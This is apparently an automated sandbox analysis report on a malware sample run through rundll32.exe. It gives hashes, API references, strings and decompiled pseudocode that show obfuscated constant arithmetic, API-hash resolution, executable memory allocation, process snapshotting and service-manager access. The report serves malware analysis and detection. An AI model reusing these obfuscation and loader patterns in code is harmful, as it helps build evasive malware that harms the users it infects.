Instruction ID: 3209ab7577ab9290082faeea64f5f446ae6289dd8bdffbf1c056694765da0acb
Opcode Fuzzy Hash: e3ed2fb30a03a0d1c989bcbbb7f9e6fee00971d9c82f67c3775a44c1b9fa6c36
Instruction Fuzzy Hash: DE311BB2A05209AFDF11DFA5CD44AEFB7BCAB5A304F004526F915E7200EB34DA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00198404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00198471
GetSystemMetrics.USER32(00000001), ref: 0019847C

Strings

DISPLAY, xrefs: 0019849D
GetMonitorInfoA, xrefs: 0019841C
/}Au, xrefs: 00198471, 0019847C

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: da5c7d8bac1d85f3f97491f9b734fc02ae2f70ca1c4a7139c2ef879fc232ff30
Instruction ID: b7fae4addde81ab71979cacd3540e12ee4cbcf10632d35c76a76bcc79fc73b43
Opcode Fuzzy Hash: da5c7d8bac1d85f3f97491f9b734fc02ae2f70ca1c4a7139c2ef879fc232ff30
Instruction Fuzzy Hash: A61104326027169FDB20CF60DC44BA7B7E8EF06724F00452AFD59DB640DB70A880CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001984D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00198545
GetSystemMetrics.USER32(00000001), ref: 00198550

Strings

DISPLAY, xrefs: 00198571
GetMonitorInfoW, xrefs: 001984F0
/}Au, xrefs: 00198545, 00198550

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: c8a796a7865c2206d9473bacdd6ebad67840a60882602d88434f851ed4e313a3
Instruction ID: 9e58ff292b6a3418864d5fe5565fcd7b12dcc81ae617c55961dcf43440ac6513
Opcode Fuzzy Hash: c8a796a7865c2206d9473bacdd6ebad67840a60882602d88434f851ed4e313a3
Instruction Fuzzy Hash: 69110472A027149FEB20DF648C44BA7B7F8EB06310F05452BED49D7680DBB1A849CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00198298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 001982E6
GetSystemMetrics.USER32(00000001), ref: 001982F8

Strings

MonitorFromPoint, xrefs: 001982AA
/}Au, xrefs: 001982E6, 001982F8

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 485f379f44ad84fe6adc680855bda1a1ba71032a999084e00f53711cc159aa4d
Instruction ID: c174ab9127fcf21f58a00a041189980eef6fa062c8699bfbc976001be40f5f42
Opcode Fuzzy Hash: 485f379f44ad84fe6adc680855bda1a1ba71032a999084e00f53711cc159aa4d
Instruction Fuzzy Hash: 30018132203318AFDF044F54DC84B9E7BA5FB52B55F444126F9049B251CB71EE828BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00198170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 001981C1
GetSystemMetrics.USER32(00000001), ref: 001981CD

Strings

MonitorFromRect, xrefs: 00198185
/}Au, xrefs: 001981C1, 001981CD

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: 4e4478f62f082a1ad35321379d5483a363f57de785dc2655a0465cb8c9de342a
Instruction ID: d0b09ab2885c5a2a7e657ec2fa60e660493f1245b34a28b6d5b9a8541ba906c8
Opcode Fuzzy Hash: 4e4478f62f082a1ad35321379d5483a363f57de785dc2655a0465cb8c9de342a
Instruction Fuzzy Hash: 0D016D322023159FDB10AF14DD85B57B799E742395F148077EE04DB602CB75DC829BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D2B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 001D2B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 001D2BA9
DdeGetLastError.USER32(00000015), ref: 001D2BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 001D2BCD

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 398f79f000cdac16d47f2505963700126140e469e65c2ef50c7a84bf8ca0d3f1
Instruction ID: 28c3b692be2c23790100fad0819dc4e0af5e43b9f53ca3e20938b29d0b30a10e
Opcode Fuzzy Hash: 398f79f000cdac16d47f2505963700126140e469e65c2ef50c7a84bf8ca0d3f1
Instruction Fuzzy Hash: B621F9752042409FDB41EF68C8C1F6AB7E8AB59310F158296F9A8CF3A6D775EC40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001980E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00198110

Strings

GetSystemMetrics, xrefs: 001980F8
/}Au, xrefs: 001980FD, 0019810A, 00198110

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: ae1f396a1c0ab798bf3673dd23aedc95c2acc2afaaa1e5bd01d78792e693c86b
Instruction ID: 0a403ee64940833a235fc7b623b029d34191c26a45b3c1a71f0063523e65fca4
Opcode Fuzzy Hash: ae1f396a1c0ab798bf3673dd23aedc95c2acc2afaaa1e5bd01d78792e693c86b
Instruction Fuzzy Hash: 7BF0BE322162414EDF184B3CDE846223686A753730F648B33E2268A6E6DF3988839258

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 3040 Parent PID: 2500 rundll32.exeCOMMON

Executed Functions

Function 002834DF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
processCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E002834DF(int __edx) {
				void* _v3;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t40;
				void* _t49;
				signed int _t50;
				signed int _t51;
				int _t58;
				void* _t60;
				signed int _t62;

				_v16 = 0x3534;
				_t40 = _v16;
				_push(0x16);
				_t58 = __edx;
				do {
					_pop(_t50);
					_v16 = _t40 / _t50;
					_t40 = _v16 * 0x7d;
					_t51 = 0x36;
					_push(0xf9b1620b);
					_t60 = _t60 - 0xc;
					_v16 = _t40;
					_v16 = _v16 ^ 0x000131e9;
					_v20 = 0x4194;
					_v20 = _v20 ^ 0x724df7d3;
					_t15 =  &_v20;
					 *_t15 = _v20 ^ 0x724dc2aa;
					_t62 =  *_t15;
				} while (_t62 < 0);
				asm("clc");
				asm("adc cl, cl");
				 *_t40 =  *_t40 + _t40;
				_v12 = _v12 ^ 0x16701329;
				_v12 = _v12 + 0xc25e;
				_v12 = _v12 ^ 0x1671dda1;
				_v8 = 0xd264;
				_v8 = _v8 + 0x944a;
				_push(0x92c871b1);
				_v8 = _v8 / _t51;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x0001fad6;
				E002904D5(0x277, _v8 % _t51);
				_t49 = CreateToolhelp32Snapshot(_t58, 0); // executed
				return _t49;
			}

0x002834e5
0x002834ec
0x002834f0
0x002834f2
0x002834f4
0x002834f6
0x002834fb
0x00283500
0x00283504
0x00283505
0x0028350a
0x0028350d
0x00283510
0x00283517
0x0028351e
0x00283525
0x00283525
0x00283525
0x0028352b
0x0028352e
0x0028352f
0x00283531
0x00283533
0x0028353a
0x00283541
0x00283548
0x0028354f
0x0028355b
0x00283560
0x00283568
0x0028356c
0x0028357f
0x0028358a
0x00283590

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 0028358A

Strings

45, xrefs: 002834E5

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID: 45
API String ID: 3332741929-2889884971
Opcode ID: ae8b87895ecfd71cd2995f981538b3d8775256a384d4c121ff71fd7be261020e
Instruction ID: 41b6b148f5f824c6d5b43a06fac87709f0838df425dbf21099b6eccb20e5319a
Opcode Fuzzy Hash: ae8b87895ecfd71cd2995f981538b3d8775256a384d4c121ff71fd7be261020e
Instruction Fuzzy Hash: 1E113A71D00208EFEB44DFE5C94A9DEBBB5EB40304F20C19AD415AB280D3B95B058F80

Uniqueness

Uniqueness Score: -1.00%

Function 0028CC2A, Relevance: 1.6, APIs: 1, Instructions: 62
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0028CC2A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t46;
				intOrPtr* _t53;
				void* _t54;
				void* _t58;
				void* _t59;

				_t58 = __edx;
				_t59 = __ecx;
				E002856B2(_t46);
				_v20 = 0x7bd6;
				_v20 = _v20 >> 0xc;
				_v20 = _v20 ^ 0x000077a7;
				_v8 = 0xd2e7;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 + 0xffff38b8;
				_v8 = _v8 + 0xffff7335;
				_v8 = _v8 ^ 0xfffec8c1;
				_v12 = 0xb0db;
				_v12 = _v12 + 0x3b6f;
				_v12 = _v12 * 0x54;
				_v12 = _v12 ^ 0x004d827d;
				_v16 = 0x4702;
				_v16 = _v16 | 0x476a8292;
				_v16 = _v16 ^ 0x476adb77;
				_t53 = E002904D5(0x346, __edx, 0xf323e9a7, 0x7a33b29a, __ecx, __edx, _a4);
				_t54 =  *_t53(_a20, _t58, _a4, _a32, _a40, 0, _a24, _t59, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, 0); // executed
				return _t54;
			}

0x0028cc37
0x0028cc39
0x0028cc58
0x0028cc5d
0x0028cc67
0x0028cc70
0x0028cc77
0x0028cc7e
0x0028cc82
0x0028cc89
0x0028cc90
0x0028cc97
0x0028cc9e
0x0028ccb1
0x0028ccb4
0x0028ccbb
0x0028ccc2
0x0028ccc9
0x0028cce1
0x0028ccfc
0x0028cd03

APIs

CryptDecodeObjectEx.CRYPT32(00000000,00002D97,004D827D,?,?,00000000,?,?), ref: 0028CCFC

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID:
API String ID: 1207547050-0
Opcode ID: a4c6788ad4119e49586979e1203e441b2991bde6672f3443533f6cd64ed70956
Instruction ID: 1bd7b106fe4304ee2f2708bab33dc73bf0fd0b7af56ca8d2f1ff9f6844247252
Opcode Fuzzy Hash: a4c6788ad4119e49586979e1203e441b2991bde6672f3443533f6cd64ed70956
Instruction Fuzzy Hash: 8421E572801209FBDF129FA4CC069DEBF75FF49314F118198FA1866260D3769A24DF81

Uniqueness

Uniqueness Score: -1.00%

Function 002E3928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 002E39C2
VirtualAlloc.KERNELBASE(00000000,002E6CB4,00001000,00000040), ref: 002E3A8E

Strings

|l., xrefs: 002E3961
trty55345, xrefs: 002E39BD

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|l.
API String ID: 2643768156-1491097063
Opcode ID: 104e3c5f00e21bbade32ce1ad6087778a59482f6a9d2e140b589989eccd1690a
Instruction ID: 2402ced29e4ee9b376385c4d78ce77dd13e940e2f3f00558d199cc8101dfdd1f
Opcode Fuzzy Hash: 104e3c5f00e21bbade32ce1ad6087778a59482f6a9d2e140b589989eccd1690a
Instruction Fuzzy Hash: 756180746912C19FD740DF28FDCEB5537A2F728395B60A41AE48A8F2B1DB71A854CF04

Uniqueness

Uniqueness Score: -1.00%

Function 002878F0, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E002878F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t49;
				signed int _t51;
				void* _t56;

				_push(_a12);
				_t56 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002856B2(_t40);
				_v16 = 0x524d;
				_v16 = _v16 ^ 0x99c40e8a;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x22e67b2e;
				_v8 = 0x3b7d;
				_v8 = _v8 << 3;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xffff78bf;
				_v8 = _v8 ^ 0x003ae656;
				_v12 = 0xe9f0;
				_v12 = _v12 + 0xffff2fbb;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000f034;
				_v20 = 0x1cdc;
				_t51 = 0x3d;
				_push(0xf9b1620b);
				_v20 = _v20 / _t51;
				_v20 = _v20 ^ 0x00004e2d;
				_push(0xd18a469);
				E002904D5(_t51 + 0x71, _v20 % _t51);
				_t49 = CloseHandle(_t56); // executed
				return _t49;
			}

0x002878f7
0x002878fa
0x002878fc
0x002878ff
0x00287903
0x00287904
0x00287909
0x00287913
0x0028791c
0x00287920
0x00287927
0x0028792e
0x00287932
0x00287936
0x0028793d
0x00287944
0x0028794b
0x00287952
0x00287956
0x0028795d
0x00287969
0x0028796c
0x00287971
0x00287977
0x0028798d
0x00287992
0x0028799b
0x002879a1

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000044), ref: 0028799B

Strings

V:, xrefs: 0028793D
.{", xrefs: 00287920

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: .{"$V:
API String ID: 2962429428-4012127490
Opcode ID: 7f2f5ecfd647bd061181deac43e7d57022e936a481046fe213cab76c0819ac8e
Instruction ID: 73ae748cf10756315784bfd49f7835ac3f2cd83170f696c18e962d169cafe5de
Opcode Fuzzy Hash: 7f2f5ecfd647bd061181deac43e7d57022e936a481046fe213cab76c0819ac8e
Instruction Fuzzy Hash: F21132B6D01219ABEF01EFA4C80A8AEBBB4FF00358F108598E82162291D3B44B14DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0028D606, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ProcessIdToSessionId.KERNELBASE(00000000,00008453,?,?,?,?,?,?,?,?,?,?,?,000034D2,000034D2), ref: 0028D6D0

Strings

oT, xrefs: 0028D620

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: ProcessSession
String ID: oT
API String ID: 3779259828-1783789081
Opcode ID: b1d8ec1da3a3e6da67b8d1fb23764df17a7bc4d50fd4cd016f919f95653b2878
Instruction ID: ebb875a500cd850d2509f5f1d17e9b5ebddd162485fa9f74c5d39b8eb7089667
Opcode Fuzzy Hash: b1d8ec1da3a3e6da67b8d1fb23764df17a7bc4d50fd4cd016f919f95653b2878
Instruction Fuzzy Hash: 22213675D00608FFEF04DFE8D8469DEBBB1FB48314F108499E514A6290D7B99B149F91

Uniqueness

Uniqueness Score: -1.00%

Function 002E1638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DdeInitializeA.USER32(00000044,Function_0003D428,00000000,00000000), ref: 002E1686

Strings

Link, xrefs: 002E1666

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 18cb2a206c2999a7672e9d3b2d8b3ba03c4f7132fed49be8c357916a4de9c755
Instruction ID: dcd915e453f1e30ce4b88a40eddaa15eb89feb85af8f858cd2c88b42453acb4e
Opcode Fuzzy Hash: 18cb2a206c2999a7672e9d3b2d8b3ba03c4f7132fed49be8c357916a4de9c755
Instruction Fuzzy Hash: E8119E74661780ABC720FB76DD82A4E77E8EF05B10F901875F400DBA91EA32AA318B55

Uniqueness

Uniqueness Score: -1.00%

Function 0029BC7A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0029BC7A(void* __ecx, long __edx, intOrPtr _a4, long _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t58;
				signed int _t60;
				long _t65;

				_push(_a12);
				_t65 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002856B2(_t49);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x66502c;
				_v20 = 0x768f;
				_v20 = _v20 << 5;
				_v20 = _v20 + 0xfffffbc4;
				_v20 = _v20 ^ 0x000ea418;
				_v16 = 0x500;
				_v16 = _v16 >> 9;
				_v16 = _v16 + 0xffffec62;
				_v16 = _v16 ^ 0xffffff63;
				_v12 = 0xceeb;
				_v12 = _v12 ^ 0x4583d5c1;
				_v12 = _v12 ^ 0xf61c5ed0;
				_v12 = _v12 ^ 0xb39f3c56;
				_v8 = 0x5074;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 << 0xc;
				_t60 = 0x23;
				_push(0xf9b1620b);
				_v8 = _v8 / _t60;
				_v8 = _v8 ^ 0x00001ec9;
				_push(0xb236b160);
				E002904D5(0x11e, _v8 % _t60);
				_t58 = RtlAllocateHeap(_a12, _a8, _t65); // executed
				return _t58;
			}

0x0029bc81
0x0029bc84
0x0029bc86
0x0029bc89
0x0029bc8c
0x0029bc8e
0x0029bc93
0x0029bc9a
0x0029bca0
0x0029bca7
0x0029bcae
0x0029bcb2
0x0029bcb9
0x0029bcc0
0x0029bcc7
0x0029bccb
0x0029bcd2
0x0029bcd9
0x0029bce0
0x0029bce7
0x0029bcee
0x0029bcf5
0x0029bcfc
0x0029bd00
0x0029bd09
0x0029bd0c
0x0029bd11
0x0029bd17
0x0029bd2f
0x0029bd34
0x0029bd43
0x0029bd49

APIs

RtlAllocateHeap.NTDLL(000EA418,FFFFFF63,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0029BD43

Strings

,Pf, xrefs: 0029BCA0

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: ,Pf
API String ID: 1279760036-3497852847
Opcode ID: ad5329f324947bd6ad91a5ee611d71534c280ea3f991268019b2c6de388f8791
Instruction ID: dfaea3399fad8ae0c06124cc3afe1eed01dd3be180c6316f370669949a2f723e
Opcode Fuzzy Hash: ad5329f324947bd6ad91a5ee611d71534c280ea3f991268019b2c6de388f8791
Instruction Fuzzy Hash: 2A2113B2D0160DEBDF14DFE5C84A9DEBBB1FB50318F108188E92566291D7B94B24DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0028DA66, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0028DA66(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t31;
				void* _t39;
				int _t44;

				_push(_a12);
				_t44 = __ecx;
				_push(0);
				E002856B2(_t31);
				_v12 = 0x9824;
				_v12 = _v12 | 0xcb7da71d;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x00658752;
				_v8 = 0xd578;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0xe0002fd4;
				_v20 = 0xfe7d;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x0000585e;
				_v16 = 0x6de1;
				_v16 = _v16 * 0x4e;
				_v16 = _v16 ^ 0x00213735;
				E002904D5(0x133, __edx, 0x247cad2d, 0x44ef1c65, __ecx, 0, _a4);
				_t39 = OpenSCManagerW(0, 0, _t44); // executed
				return _t39;
			}

0x0028da6e
0x0028da73
0x0028da75
0x0028da7b
0x0028da80
0x0028da8a
0x0028da96
0x0028da9a
0x0028daa1
0x0028daa8
0x0028daac
0x0028dab0
0x0028dab7
0x0028dabe
0x0028dac2
0x0028dac9
0x0028dadc
0x0028dadf
0x0028daf7
0x0028db02
0x0028db09

APIs

OpenSCManagerW.SECHOST(00000000,00000000,F184FF7E,?,?,?,?,?,?,?,?,?,?,?,00000000,000043DE), ref: 0028DB02

Strings

57!, xrefs: 0028DADF

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: 57!
API String ID: 1889721586-26168835
Opcode ID: 7502bf563648451cdc6ee3fba127c124e0b279864468f40488bc13250c57ca7a
Instruction ID: 6b1b667aa1d4f5239f1128dfb414ab152a98b47af9472c50d69f3a08e5db53f9
Opcode Fuzzy Hash: 7502bf563648451cdc6ee3fba127c124e0b279864468f40488bc13250c57ca7a
Instruction Fuzzy Hash: 01113675C0021CBBDB04EFA5CC4989EBFB4EF80344F108099E825A3251D7B54B14CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C0540, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,?), ref: 001C058F
VirtualProtect.KERNEL32(?,?,00000000), ref: 001C07D9

Memory Dump Source

Source File: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 74870ab909fccf20d5c23d6a1bc5b41496fbbf5be091f3f7cf8121e969076f99
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: D6C1A6B5A00209DFCB49CF88C590EAEB7B5BF98304F248159E959AB351D735EE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002E1A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 002E1AC8: DdeFreeStringHandle.USER32(?,?), ref: 002E1AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 002E1A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 002E1A95

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 7eb8716366f043ec4fc137d14286b95d840445821cc97fe1976409a97f160310
Instruction ID: 3bf214f795d5f9d3294253e66c4e8567b56ccf308414c89853ba8cc7abe1623e
Opcode Fuzzy Hash: 7eb8716366f043ec4fc137d14286b95d840445821cc97fe1976409a97f160310
Instruction Fuzzy Hash: 361182357722555BCB11FEA5C882A5E37ACEF09B00B810570FC009B386E670ED218B94

Uniqueness

Uniqueness Score: -1.00%

Function 001C0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 001C00A4

Strings

VirtualAlloc, xrefs: 001C0089, 001C008C

Memory Dump Source

Source File: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: ec8c1f81707a33e1393e801300cdd82cb5947c98347dbeac17e3aa334a35938d
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 19113060D08289DAEF01D7E89809BFFBFB55B25704F044098E6446A282D3BA575887A6

Uniqueness

Uniqueness Score: -1.00%

Function 0028492A, Relevance: 1.6, APIs: 1, Instructions: 81
fileCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0028492A(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a20, intOrPtr _a24, WCHAR* _a32, long _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t61;
				void* _t73;
				signed int _t76;
				signed int _t77;
				long _t84;
				long _t85;

				_push(_a48);
				_t84 = __edx;
				_push(_a44);
				_t85 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002856B2(_t61);
				_v32 = 0x27f13a;
				_v28 = 0x4c0b57;
				_v24 = 0;
				_v12 = 0x7aa4;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xb16472e1;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x01635afc;
				_v20 = 0x7b28;
				_t76 = 0x76;
				_v20 = _v20 / _t76;
				_t77 = 0x7f;
				_push(0xf9b1620b);
				_v20 = _v20 * 0xf;
				_v20 = _v20 ^ 0x000069c5;
				_v8 = 0xb1fe;
				_v8 = _v8 << 6;
				_v8 = _v8 >> 7;
